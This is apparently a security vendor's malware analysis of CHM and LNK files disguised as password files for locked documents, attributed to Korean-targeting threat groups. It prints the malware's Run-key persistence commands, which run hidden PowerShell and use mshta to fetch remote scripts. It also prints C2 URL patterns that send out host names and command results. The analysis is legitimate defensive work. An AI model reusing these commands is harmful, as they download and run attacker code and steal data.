Malware Distributed Disguised as a Password File
AhnLab Security Emergency response Center (ASEC) discovered a malware strain disguised as a password file and being distributed alongside a normal file within a compressed file last month. It is difficult for users to notice that this file is malicious because this type of malware is distributed together with a normal file. The recently discovered malware was in CHM and LNK file formats. In the case of the CHM file, it shares the same type as the malware covered in the below post and is assumed to have been created by the same threat group.
CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft)
It is believed that the CHM and LNK files are distributed while compressed together with a normal, password-locked file. Users are led to execute the CHM or LNK files since they appear as if they hold the passwords for the password-protected Excel and HWP files.
Figure 1. Inside the compressed files
While the two types were distributed in the same format, the malicious behaviors ultimately executed suggest that they were created by different groups.
- CHM Type
Executing passwd.chm or Password.chm, as shown in Figure 1, displays the password to the locked file and simultaneously triggers the execution of the malicious script they contain.
Figure 2. Help screen displayed when passwd.chm is executed
Figure 3. Contents of Shoes.xlsx that is displayed upon unlocking the file
Figure 4. Help screen displayed when Password.chm is executed
Figure 5. Contents of 2020_normal_ko.hwp that is displayed upon unlocking the file
Below is an example of the malicious script found in the CHM files. Using the mshta process, it triggers the execution of an additional script that exists within a malicious URL.
Figure 6. Malicious script within the CHM file
The additional script run through the mshta process is in the same format as the command shared in the post <CHM Malware Disguised as Security Email from a Korean Financial Company: RedEyes(ScarCruft)>. This script is responsible for registering to the RUN key, receiving commands from the threat actor’s server, and transmitting the command execution results.
Figure 7. Malicious script found within 1.html
- RUN key registration Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Value name: icxrNpVd Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc.kr/skin/product/1.html
- C2 Receives threat actor’s commands – hxxp://shacc[.]kr/skin/product/mid.php?U=[Computer Name]+[Username] Transmits command execution results – hxxp://shacc[.]kr/skin/product/mid.php?R=[Base64-encoded]
Figure 8. Malicious script found within 11.html
- RUN key registration Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Value name: aeF Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 496433 2.2.2.2 || mshta hxxp://141.105.65.165/data/11.html
- C2 Receives threat actor’s commands – hxxp://141.105.65.165/data//mid.php?U=[Computer Name]+[Username] Transmits command execution results – hxxp://141.105.65.165/data/mid.php?R=[Base64-encoded]
- LNK Type
The password.txt.lnk file shown in Figure 1 creates a text file containing the password and the malicious script file in the %temp% folder when executed.
Figure 9. Additional script and password.txt file that is created
Figure 10. Contents of PersonalDataUseAgreement.hwp that is displayed upon unlocking the file
As shown below, the VBS file is responsible for running the additional malicious script that exists within hxxp://hondes.getenjoyment[.]net/denak/info/list.php?query=1.
Figure 11. Created VBS file
Looking at the URL format, the LNK type is the same as the malware covered in the post below, which leads the team to believe that it was created by the same threat group.
https://asec.ahnlab.com/en/45658/
This type of malware can perform a variety of malicious behaviors according to the threat actor’s intentions. Furthermore, since various other threat groups are utilizing this method of distributing malware alongside a normal file, the team predicts there are other forms of this malware aside from the CHM and LNK files that have already been confirmed. As shown above, since various forms of malware are being distributed to Korean users, users are advised to always check the sender of the emails they receive and be especially cautious about opening attached files. [File Detection] Trojan/CHM.Agent (2023.03.08.03) Dropper/LNK.Agent (2023.02.28.00)
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
